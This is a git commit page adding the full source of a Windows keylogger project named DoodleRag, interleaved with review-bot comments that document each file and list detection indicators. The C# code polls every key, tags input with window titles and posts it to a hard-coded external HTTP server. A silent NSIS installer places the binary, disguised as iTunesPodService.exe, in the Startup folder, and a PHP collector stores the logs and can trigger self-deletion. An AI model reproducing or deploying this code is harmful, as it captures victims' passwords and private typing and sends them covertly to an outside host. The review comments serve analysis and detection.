authorJason A. Donenfeld <Jason@zx2c4.com>2010-04-19 02:53:35 -0400
committerJason A. Donenfeld <Jason@zx2c4.com>2010-04-19 02:53:35 -0400
commit97ce1cba643f91cf6dcec3b3be173b764d2670e1 (patch)
tree1e6c41ed80db49c62cd7bb42d1d52dfe5f78f99c
Initial commit.
-rw-r--r--.gitignore5
-rw-r--r--DoodleRag.csproj107
-rw-r--r--DoodleRag.sln19
-rw-r--r--Keylogger.cs268
-rw-r--r--Main.cs21
-rw-r--r--Uploader.cs81
-rw-r--r--installer.nsi9
-rw-r--r--logger.php32
8 files changed, 542 insertions, 0 deletions
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..1981c02
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,5 @@
+*.suo
+*.user
+*.exe
+bin
+obj
diff --git a/DoodleRag.csproj b/DoodleRag.csproj
new file mode 100644
index 0000000..da60ac0
--- /dev/null
+++ b/DoodleRag.csproj
@@ -0,0 +1,107 @@
+<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+ <PropertyGroup>
+ <ProjectType>Local</ProjectType>
+ <ProductVersion>8.0.50727</ProductVersion>
+ <SchemaVersion>2.0</SchemaVersion>
+ <ProjectGuid>{AFD1F7AF-7974-40CE-9E95-F984D99A572D}</ProjectGuid>
+ <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
+ <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
+ <ApplicationIcon>
+ </ApplicationIcon>
+ <AssemblyKeyContainerName>
+ </AssemblyKeyContainerName>
+ <AssemblyName>iTunesPodService</AssemblyName>
+ <AssemblyOriginatorKeyFile>
+ </AssemblyOriginatorKeyFile>
+ <DefaultClientScript>JScript</DefaultClientScript>
+ <DefaultHTMLPageLayout>Grid</DefaultHTMLPageLayout>
+ <DefaultTargetSchema>IE50</DefaultTargetSchema>
+ <DelaySign>false</DelaySign>
+ <OutputType>WinExe</OutputType>
+ <RootNamespace>Logger</RootNamespace>
+ <RunPostBuildEvent>OnBuildSuccess</RunPostBuildEvent>
+ <StartupObject>
+ </StartupObject>
+ <FileUpgradeFlags>
+ </FileUpgradeFlags>
+ <UpgradeBackupLocation>
+ </UpgradeBackupLocation>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
+ <OutputPath>bin\Debug\</OutputPath>
+ <AllowUnsafeBlocks>false</AllowUnsafeBlocks>
+ <BaseAddress>285212672</BaseAddress>
+ <CheckForOverflowUnderflow>false</CheckForOverflowUnderflow>
+ <ConfigurationOverrideFile>
+ </ConfigurationOverrideFile>
+ <DefineConstants>DEBUG;TRACE</DefineConstants>
+ <DocumentationFile>
+ </DocumentationFile>
+ <DebugSymbols>true</DebugSymbols>
+ <FileAlignment>4096</FileAlignment>
+ <NoStdLib>false</NoStdLib>
+ <NoWarn>
+ </NoWarn>
+ <Optimize>false</Optimize>
+ <RegisterForComInterop>false</RegisterForComInterop>
+ <RemoveIntegerChecks>false</RemoveIntegerChecks>
+ <TreatWarningsAsErrors>false</TreatWarningsAsErrors>
+ <WarningLevel>4</WarningLevel>
+ <DebugType>full</DebugType>
+ <ErrorReport>prompt</ErrorReport>
+ </PropertyGroup>
+ <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
+ <OutputPath>bin\Release\</OutputPath>
+ <AllowUnsafeBlocks>false</AllowUnsafeBlocks>
+ <BaseAddress>285212672</BaseAddress>
+ <CheckForOverflowUnderflow>false</CheckForOverflowUnderflow>
+ <ConfigurationOverrideFile>
+ </ConfigurationOverrideFile>
+ <DefineConstants>TRACE</DefineConstants>
+ <DocumentationFile>
+ </DocumentationFile>
+ <DebugSymbols>false</DebugSymbols>
+ <FileAlignment>4096</FileAlignment>
+ <NoStdLib>false</NoStdLib>
+ <NoWarn>
+ </NoWarn>
+ <Optimize>true</Optimize>
+ <RegisterForComInterop>false</RegisterForComInterop>
+ <RemoveIntegerChecks>false</RemoveIntegerChecks>
+ <TreatWarningsAsErrors>false</TreatWarningsAsErrors>
+ <WarningLevel>4</WarningLevel>
+ <DebugType>none</DebugType>
+ <ErrorReport>prompt</ErrorReport>
+ </PropertyGroup>
+ <ItemGroup>
+ <Reference Include="System">
+ <Name>System</Name>
+ </Reference>
+ <Reference Include="System.Data">
+ <Name>System.Data</Name>
+ </Reference>
+ <Reference Include="System.Web" />
+ <Reference Include="System.Windows.Forms">
+ <Name>System.Windows.Forms</Name>
+ </Reference>
+ <Reference Include="System.Xml">
+ <Name>System.XML</Name>
+ </Reference>
+ </ItemGroup>
+ <ItemGroup>
+ <Compile Include="Keylogger.cs">
+ <SubType>Code</SubType>
+ </Compile>
+ <Compile Include="Main.cs">
+ <SubType>Code</SubType>
+ </Compile>
+ <Compile Include="Uploader.cs" />
+ </ItemGroup>
+ <Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
+ <PropertyGroup>
+ <PreBuildEvent>
+ </PreBuildEvent>
+ <PostBuildEvent>
+ </PostBuildEvent>
+ </PropertyGroup>
+</Project> \ No newline at end of file
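Review bot: `<AssemblyName>iTunesPodService</AssemblyName>` does not match the project, the solution or `RootNamespace` (`DoodleRag` / `Logger`), and nothing in the file says why. The built executable therefore appears on disk and in process lists under a name that does not identify this project, and `installer.nsi` hard-codes the same name. I would either set it to `DoodleRag` or record the coupling in a comment, e.g. `<!-- Output is iTunesPodService.exe; installer.nsi references this name -->`. When triaging a host, the mismatch between the file name and the `Logger` namespace inside the assembly is the detail to check.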
diff --git a/DoodleRag.sln b/DoodleRag.sln
new file mode 100644
index 0000000..4b12b46
--- /dev/null
+++ b/DoodleRag.sln
@@ -0,0 +1,19 @@
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DoodleRag", "DoodleRag.csproj", "{AFD1F7AF-7974-40CE-9E95-F984D99A572D}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {AFD1F7AF-7974-40CE-9E95-F984D99A572D}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+EndGlobal
diff --git a/Keylogger.cs b/Keylogger.cs
new file mode 100644
index 0000000..d150fc5
--- /dev/null
+++ b/Keylogger.cs
@@ -0,0 +1,268 @@
+using System;
+using System.Threading;
+using System.IO;
+using System.Text;
+using System.Windows.Forms;
+using System.Runtime.InteropServices;
+
+namespace Logger
+{
+ public class Keylogger
+ {
+ [DllImport("User32.dll")]
+ private static extern short GetAsyncKeyState(Keys vKey);
+ [DllImport("User32.dll")]
+ private static extern short GetAsyncKeyState(int vKey);
+ [DllImport("User32.dll")]
+ public static extern int GetWindowText(int hwnd, StringBuilder s, int nMaxCount);
+ [DllImport("User32.dll")]
+ public static extern int GetForegroundWindow();
+
+ private StringBuilder buffer;
+ private string hWndTitle;
+ private string hWndTitlePast;
+ private bool tglAlt = false;
+ private bool tglControl = false;
+ private bool tglCapslock = false;
+
+ public Keylogger()
+ {
+ buffer = new StringBuilder(10000);
+ new Thread(new ThreadStart(logKey)).Start();
+ }
+
+ public static string ActiveApplTitle()
+ {
+ int hwnd = GetForegroundWindow();
+ StringBuilder sbTitle = new StringBuilder(1024);
+ int intLength = GetWindowText(hwnd, sbTitle, sbTitle.Capacity);
+ if ((intLength <= 0) || (intLength > sbTitle.Length)) return "unknown";
+ return sbTitle.ToString();
+ }
+
+ private void logKey()
+ {
+ while (true)
+ {
+ string keyBuffer = string.Empty;
+ hWndTitle = ActiveApplTitle();
+
+ if (hWndTitle != hWndTitlePast || hWndTitlePast == null)
+ {
+ keyBuffer += "\n\n[" + hWndTitle + "]\n";
+ hWndTitlePast = hWndTitle;
+ }
+
+ foreach (int i in Enum.GetValues(typeof(Keys)))
+ {
+ if (GetAsyncKeyState(i) == -32767)
+ {
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000))
+ {
+ if (!tglControl)
+ {
+ tglControl = true;
+ keyBuffer += "<Ctrl=On>";
+ }
+ }
+ else
+ {
+ if (tglControl)
+ {
+ tglControl = false;
+ keyBuffer += "<Ctrl=Off>";
+ }
+ }
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000))
+ {
+ if (!tglAlt)
+ {
+ tglAlt = true;
+ keyBuffer += "<Alt=On>";
+ }
+ }
+ else
+ {
+ if (tglAlt)
+ {
+ tglAlt = false;
+ keyBuffer += "<Alt=Off>";
+ }
+ }
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.CapsLock) & 0x8000))
+ {
+ if (!tglCapslock)
+ {
+ tglCapslock = true;
+ keyBuffer += "<CapsLock=On>";
+ }
+ }
+ else
+ {
+ if (tglCapslock)
+ {
+ tglCapslock = false;
+ keyBuffer += "<CapsLock=Off>";
+ }
+ }
+ if (Enum.GetName(typeof(Keys), i) == "LButton")
+ keyBuffer += "<LMouse>";
+ else if (Enum.GetName(typeof(Keys), i) == "RButton")
+ keyBuffer += "<RMouse>";
+ else if (Enum.GetName(typeof(Keys), i) == "Back")
+ keyBuffer += "<Backspace>";
+ else if (Enum.GetName(typeof(Keys), i) == "Space")
+ keyBuffer += " ";
+ else if (Enum.GetName(typeof(Keys), i) == "Return")
+ keyBuffer += "<Enter>";
+ else if (Enum.GetName(typeof(Keys), i) == "ControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "LControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "RControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "LControlKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "ShiftKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "LShiftKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "RShiftKey")
+ continue;
+ else if (Enum.GetName(typeof(Keys), i) == "Delete")
+ keyBuffer += "<Del>";
+ else if (Enum.GetName(typeof(Keys), i) == "Insert")
+ keyBuffer += "<Ins>";
+ else if (Enum.GetName(typeof(Keys), i) == "Home")
+ keyBuffer += "<Home>";
+ else if (Enum.GetName(typeof(Keys), i) == "End")
+ keyBuffer += "<End>";
+ else if (Enum.GetName(typeof(Keys), i) == "Tab")
+ keyBuffer += "<Tab>";
+ else if (Enum.GetName(typeof(Keys), i) == "Prior")
+ keyBuffer += "<Page Up>";
+ else if (Enum.GetName(typeof(Keys), i) == "PageDown")
+ keyBuffer += "<Page Down>";
+ else if (Enum.GetName(typeof(Keys), i) == "LWin" || Enum.GetName(typeof(Keys), i) == "RWin")
+ keyBuffer += "<Win>";
+ if (Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey) & 0x8000))
+ {
+ if (i >= 65 && i <= 122)
+ {
+ keyBuffer += (char)i;
+ }
+ else if (i.ToString() == "49")
+ keyBuffer += "!";
+ else if (i.ToString() == "50")
+ keyBuffer += "@";
+ else if (i.ToString() == "51")
+ keyBuffer += "#";
+ else if (i.ToString() == "52")
+ keyBuffer += "$";
+ else if (i.ToString() == "53")
+ keyBuffer += "%";
+ else if (i.ToString() == "54")
+ keyBuffer += "^";
+ else if (i.ToString() == "55")
+ keyBuffer += "&";
+ else if (i.ToString() == "56")
+ keyBuffer += "*";
+ else if (i.ToString() == "57")
+ keyBuffer += "(";
+ else if (i.ToString() == "48")
+ keyBuffer += ")";
+ else if (i.ToString() == "192")
+ keyBuffer += "~";
+ else if (i.ToString() == "189")
+ keyBuffer += "_";
+ else if (i.ToString() == "187")
+ keyBuffer += "+";
+ else if (i.ToString() == "219")
+ keyBuffer += "{";
+ else if (i.ToString() == "221")
+ keyBuffer += "}";
+ else if (i.ToString() == "220")
+ keyBuffer += "|";
+ else if (i.ToString() == "186")
+ keyBuffer += ":";
+ else if (i.ToString() == "222")
+ keyBuffer += "\"";
+ else if (i.ToString() == "188")
+ keyBuffer += "<";
+ else if (i.ToString() == "190")
+ keyBuffer += ">";
+ else if (i.ToString() == "191")
+ keyBuffer += "?";
+ }
+ else
+ {
+ if (i >= 65 && i <= 122)
+ {
+ keyBuffer += (char)(i + 32);
+ }
+ else if (i.ToString() == "49")
+ keyBuffer += "1";
+ else if (i.ToString() == "50")
+ keyBuffer += "2";
+ else if (i.ToString() == "51")
+ keyBuffer += "3";
+ else if (i.ToString() == "52")
+ keyBuffer += "4";
+ else if (i.ToString() == "53")
+ keyBuffer += "5";
+ else if (i.ToString() == "54")
+ keyBuffer += "6";
+ else if (i.ToString() == "55")
+ keyBuffer += "7";
+ else if (i.ToString() == "56")
+ keyBuffer += "8";
+ else if (i.ToString() == "57")
+ keyBuffer += "9";
+ else if (i.ToString() == "48")
+ keyBuffer += "0";
+ else if (i.ToString() == "189")
+ keyBuffer += "-";
+ else if (i.ToString() == "187")
+ keyBuffer += "=";
+ else if (i.ToString() == "92")
+ keyBuffer += "`";
+ else if (i.ToString() == "219")
+ keyBuffer += "[";
+ else if (i.ToString() == "221")
+ keyBuffer += "]";
+ else if (i.ToString() == "220")
+ keyBuffer += "\\";
+ else if (i.ToString() == "186")
+ keyBuffer += ";";
+ else if (i.ToString() == "222")
+ keyBuffer += "'";
+ else if (i.ToString() == "188")
+ keyBuffer += ",";
+ else if (i.ToString() == "190")
+ keyBuffer += ".";
+ else if (i.ToString() == "191")
+ keyBuffer += "/";
+ }
+ }
+ }
+ lock (buffer)
+ {
+ buffer.Append(keyBuffer);
+ }
+ Thread.Sleep(8);
+ }
+ }
+
+ public string PopLog()
+ {
+ string log;
+ lock (buffer)
+ {
+ log = buffer.ToString();
+ buffer = new StringBuilder(10000);
+ }
+ return log;
+ }
+
+ }
+}
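Review bot: The `Keylogger` class has no summary comment, and its constructor silently starts `logKey` on a new foreground thread that loops forever with no stop flag, so the only statement of its contract is the code itself. The loop polls `GetAsyncKeyState` for every `Keys` value every 8 ms, prefixes output with the foreground window title from `GetWindowText`, and holds everything in an in-memory `StringBuilder` until `PopLog` is called; nothing is filtered, so anything typed, including credentials, ends up in that buffer. I would document this on the class, e.g. `/// Polls GetAsyncKeyState for all virtual keys and buffers keystrokes, tagged with the foreground window title, until PopLog() drains them.` A tight `GetAsyncKeyState` polling loop paired with `GetForegroundWindow` is also the call pattern that behavioural endpoint rules typically match on, which is worth stating for readers analysing the binary.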
diff --git a/Main.cs b/Main.cs
new file mode 100644
index 0000000..77fd4eb
--- /dev/null
+++ b/Main.cs
@@ -0,0 +1,21 @@
+using System;
+
+namespace Logger
+{
+ class MainApp
+ {
+ [STAThread]
+ static void Main(string[] args)
+ {
+ Keylogger kl = new Keylogger();
+ Uploader upload = new Uploader("http://doodlerag.100webspace.net/logger.php?mode=log");
+ Random rnd = new Random();
+ upload.UploadLog("\n**DoodleRag startup: " + DateTime.Now.ToString() + "**\n");
+ while (true)
+ {
+ System.Threading.Thread.Sleep(rnd.Next(5 * 60 * 1000, 20 * 60 * 1000));
+ upload.UploadLog(kl.PopLog());
+ }
+ }
+ }
+}
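Review bot: `Main` hard-codes the collection URL as plain `http://` and has no comment on it or on the `rnd.Next(5 * 60 * 1000, 20 * 60 * 1000)` sleep. Everything `PopLog` returns is therefore sent unencrypted, so the host name and the form body are readable by any proxy or network sensor on the path, and the first request carries the fixed `**DoodleRag startup:` marker. A comment above the loop would make this explicit: `// Posts buffered input to a fixed HTTP endpoint at a random 5-20 minute interval; traffic is cleartext.`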
diff --git a/Uploader.cs b/Uploader.cs
new file mode 100644
index 0000000..9ec225b
--- /dev/null
+++ b/Uploader.cs
@@ -0,0 +1,81 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Threading;
+using System.IO;
+using System.Diagnostics;
+
+namespace Logger
+{
+ class Uploader
+ {
+ private Queue<string> uploadQueue;
+ private string uploadUrl;
+ public Uploader(string url)
+ {
+ uploadUrl = url;
+ uploadQueue = new Queue<string>();
+ }
+ public void UploadLog(string log)
+ {
+ lock (uploadQueue)
+ {
+ uploadQueue.Enqueue(log);
+ if (uploadQueue.Count == 1)
+ {
+ ThreadPool.QueueUserWorkItem(new WaitCallback(uploadLoop));
+ }
+ }
+ }
+ private string uploadNext()
+ {
+ try
+ {
+ System.Net.WebRequest req = System.Net.WebRequest.Create(uploadUrl);
+ req.ContentType = "application/x-www-form-urlencoded";
+ req.Method = "POST";
+ byte[] bytes;
+ lock (uploadQueue)
+ {
+ bytes = System.Text.Encoding.ASCII.GetBytes("log=" + System.Web.HttpUtility.UrlEncode(uploadQueue.Peek()));
+ }
+ req.ContentLength = bytes.Length;
+ System.IO.Stream os = req.GetRequestStream();
+ os.Write(bytes, 0, bytes.Length);
+ os.Close();
+ System.Net.WebResponse resp = req.GetResponse();
+ if (resp == null) return null;
+ System.IO.StreamReader sr = new System.IO.StreamReader(resp.GetResponseStream());
+ return sr.ReadToEnd().Trim();
+ }
+ catch { return null; }
+ }
+ private void uploadLoop(object data)
+ {
+ while (uploadQueue.Count > 0)
+ {
+ switch (uploadNext())
+ {
+ case "success":
+ lock (uploadQueue)
+ {
+ uploadQueue.Dequeue();
+ }
+ break;
+ case null:
+ case "":
+ Thread.Sleep(60000);
+ break;
+ case "remove":
+ StreamWriter sw = File.CreateText("selfdelete.bat");
+ string filename = Process.GetCurrentProcess().MainModule.FileName;
+ sw.Write("tskill /A \"{1}\"\n:Repeat\ndel \"{0}\"\nif exist \"{0}\" goto Repeat\ndel \"selfdelete.bat\"", filename, filename.Substring(filename.LastIndexOf(System.IO.Path.DirectorySeparatorChar) + 1));
+ sw.Close();
+ Process.Start("selfdelete.bat");
+ Process.GetCurrentProcess().Kill();
+ break;
+ }
+ }
+ }
+ }
+}
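Review bot: In `uploadLoop` the `case "remove"` branch is undocumented, even though it lets the body of an HTTP response make the process write `selfdelete.bat` to the current working directory, run it and kill itself. `uploadNext` fetches that response from whatever URL was passed in (plain HTTP in `Main.cs`), and `catch { return null; }` hides every failure, so the behaviour is hard to follow from the code alone. I would add `// "remove": server-requested uninstall; writes and runs selfdelete.bat (tskill + del loop), then exits.` above the case, plus a short comment on the empty catch saying that a null result is retried after 60 s. For incident response, a `selfdelete.bat` in the working directory and a `tskill /A` process launch are the traces this path produces.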
diff --git a/installer.nsi b/installer.nsi
new file mode 100644
index 0000000..3fb7571
--- /dev/null
+++ b/installer.nsi
@@ -0,0 +1,9 @@
+OutFile "doodlerag.exe"
+SilentInstall silent
+
+Section
+ SetSilent silent
+ SetOutPath "$SMSTARTUP"
+ File "bin\Release\iTunesPodService.exe"
+ Exec "$SMSTARTUP/iTunesPodService.exe"
+SectionEnd \ No newline at end of file
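Review bot: The script has no comments and no uninstall section, so nothing records that it runs with `SilentInstall silent`, copies `iTunesPodService.exe` into `$SMSTARTUP` (the Start Menu Startup folder) and executes it immediately. The program is therefore relaunched at every logon, and the only removal paths are deleting the file by hand or the server-driven `remove` branch in `Uploader.cs`. I would add a header comment stating this, e.g. `; Silent installer: drops iTunesPodService.exe into the Startup folder and launches it; no UI, no uninstaller.` An unexpected executable in the Startup folder is the on-disk indicator to look for.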
diff --git a/logger.php b/logger.php
new file mode 100644
index 0000000..9223d65
--- /dev/null
+++ b/logger.php
@@ -0,0 +1,32 @@
+<?php
+header("Content-Type: text/plain");
+if ($_GET["mode"] == "log") {
+ $file = fopen("logger.txt", "a");
+ fwrite($file, $_POST["log"]);
+ fclose($file);
+ if (file_exists("remove")) echo "remove";
+ else echo "success";
+}
+elseif ($_GET["mode"] == "disable") {
+ @fclose(@fopen("remove", "a"));
+ echo "disabled. logger will uninstall itself at next upload.";
+}
+elseif ($_GET["mode"] == "enable") {
+ @unlink("remove");
+ echo "enabled. please reinstall logger.";
+}
+elseif ($_GET["mode"] == "clearlog") {
+ @unlink("logger.txt");
+ echo "log has been removed from server.";
+}
+elseif ($_GET["mode"] == "deleteeverything") {
+ @unlink("logger.php");
+ @unlink("logger.txt");
+ @unlink("remove");
+ echo "everything is now gone. goodbye dave.";
+}
+else {
+ echo "====== LOG FILE ======\n";
+ readfile("logger.txt");
+}
+?>
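Review bot: None of the `mode` branches checks a credential, and the script has no header comment listing what each mode does. As written, any client that can reach the script can read `logger.txt` through the default branch (and presumably by requesting the file itself, since it is written next to the script), while `disable`, `clearlog` and `deleteeverything` change state on a bare GET. `$_GET["mode"]` is also read without `isset`, which raises an undefined-index notice or warning when the parameter is absent. At minimum I would document the interface: `// modes: log | disable | enable | clearlog | deleteeverything; default prints logger.txt. No access control.`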